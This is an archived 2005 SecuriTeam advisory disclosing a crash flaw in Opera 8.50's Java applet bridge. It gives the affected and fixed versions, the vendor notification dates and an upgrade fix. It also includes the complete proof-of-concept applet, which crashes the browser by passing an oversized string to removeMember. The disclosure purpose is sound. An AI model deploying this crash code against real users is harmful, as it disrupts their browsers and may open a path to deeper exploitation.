[NT] Opera Java Applet DoS
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 4 Dec 2005 10:38:08 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Opera Java Applet DoS
------------------------------------------------------------------------
SUMMARY
<http://www.opera.com/> Opera is "a computer application for handling
most common internet-related tasks, including: web browsing, sending and
receiving messages, managing contacts and online chat".
A vulnerability in a Opera allows remote attackers to cause the program to
crash by utilizing a malicious Java applet.
DETAILS
Vulnerable Systems:
* Opera version 8.50
Immune Systems:
* Opera version 8.51
It is possible to crash the opera 8.50 browser with a simple java applet
(see below). This was observed on Win32, Linux versions maybe affected,
too.
This can be tested at:
<http://www.illegalaccess.org/exploit/opera85/OperaApplet.html>
http://www.illegalaccess.org/exploit/opera85/OperaApplet.html
As you can see the applet crashes at 0x67c0a54c. This is caused by a bug
in a JNI routine implementing the com.opera.JSObject class. It cannot be
ruled out, that this bug is exploitable.
The opera guys were informed on the 21st of September, and then again on
8th of October.
Fix:
Please upgrade to the new Opera 8.51, which does not expose this weakness.
import java.applet.Applet;
import java.awt.Graphics;
import netscape.javascript.JSObject;
public class OperaTest extends Applet{
static
{
System.out.println("Loaded 1.2");
}
public void paint(Graphics g)
{
System.out.println("start");
try {
netscape.javascript.JSObject jso = JSObject.getWindow(this);
System.out.println(jso.getClass());
com.opera.JSObject j = (com.opera.JSObject ) jso;
char[] x = new char[1000000];
for (int y = 0 ; y < x.length; y++) {
x [y] = 'A';
}
String z = new String(x);
System.out.println("after evalb");
j.removeMember(z);
System.out.println("after remove");
}
catch (Exception e) {
e.printStackTrace();
}
}
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:marc.schoenefeld@xxxxxxx>
Marc Schoenefeld.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Next by Date: [NT] Windows 2000/2003 SYN DoS Attack Protection
- Next by thread: [NT] Windows 2000/2003 SYN DoS Attack Protection
- Index(es):
Relevant Pages
|
|
